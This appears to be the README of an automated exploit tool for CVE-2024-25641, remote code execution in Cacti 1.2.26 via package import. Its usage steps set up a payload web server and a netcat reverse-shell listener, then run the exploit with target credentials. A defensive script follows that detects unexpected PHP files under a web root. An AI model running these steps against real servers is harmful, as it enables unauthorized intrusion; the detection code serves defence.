Fully automated exploit for CVE-2024-25641. Cacti version 1.2.26 is vulnerable to an arbitrary file write, exploitable through the "Package Import" feature, that allows authenticated users with the "Import Templates" permission to execute arbitrary PHP code on the web server (RCE).
Credits to this PoC: https://github.com/Cacti/cacti/security/advisories/GHSA-7cmj-g5qc-pj88 (I have simply automated this to gain a foothold.)
This tool is intended for educational and testing purposes only. The author of this tool is not responsible for any misuse or illegal activities performed with it. Use this tool only on systems you own or have explicit permission to test. Unauthorized access to computer systems is illegal and unethical.
```bash
# Clone the repository
git clone https://github.com/thisisveryfunny/CVE-2024-25641-RCE-Automated-Exploit-Cacti-1.2.26.git
cd CVE-2024-25641-RCE-Automated-Exploit-Cacti-1.2.26

# Setup Python web server
python -m http.server <PYTHON_WEB_SERVER_PORT>

# Setup netcat listener
nc -lvnp <LOCAL_PORT>

# Run the tool
pip install -r requirements.txt  # if needed
python exploit.py -L <LOCAL_IP> -lp <LOCAL_PORT> -wp <PYTHON_WEB_SERVER_PORT> -url <URL> -u <USER> -p <PASS>
```
You can also check this out: CVE-2024-25641 PoC
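A defender-side check for the impact described above (an authenticated file write that places PHP under the web root): this added example, which is not part of the original repository, compares a web root against a known-good snapshot and reports script files that appeared or changed. The directory layout, file names and extension list are constructed assumptions, not Cacti's actual tree.

```python
import hashlib
import os
import tempfile

# Assumption: extensions the web server is configured to execute as PHP.
PHP_EXTS = (".php", ".phtml", ".phar")

def snapshot(root):
    """Map relative path -> SHA-256 for every file under root."""
    digests = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            with open(full, "rb") as fh:
                digests[os.path.relpath(full, root)] = hashlib.sha256(fh.read()).hexdigest()
    return digests

def diff_webroot(baseline, current):
    """Return (added, modified) script paths relative to the baseline snapshot."""
    added, modified = [], []
    for path, digest in sorted(current.items()):
        if not path.lower().endswith(PHP_EXTS):
            continue  # only files the server would execute are of interest here
        if path not in baseline:
            added.append(path)
        elif baseline[path] != digest:
            modified.append(path)
    return added, modified

def demo():
    """Constructed sample tree standing in for a web root."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "resource"))
        for rel, body in (("index.php", b"<?php // app"), ("resource/a.xml", b"<x/>")):
            with open(os.path.join(root, rel), "wb") as fh:
                fh.write(body)
        baseline = snapshot(root)  # taken right after a clean install
        # Simulate what a file-write bug leaves behind: one new script, one changed.
        with open(os.path.join(root, "resource", "new.php"), "wb") as fh:
            fh.write(b"<?php // unexpected")
        with open(os.path.join(root, "index.php"), "wb") as fh:
            fh.write(b"<?php // changed")
        return diff_webroot(baseline, snapshot(root))

if __name__ == "__main__":
    added, modified = demo()
    print("added:", added)
    print("modified:", modified)
```

In practice the baseline snapshot is stored off-host so that a process able to write under the web root cannot also rewrite the reference digests.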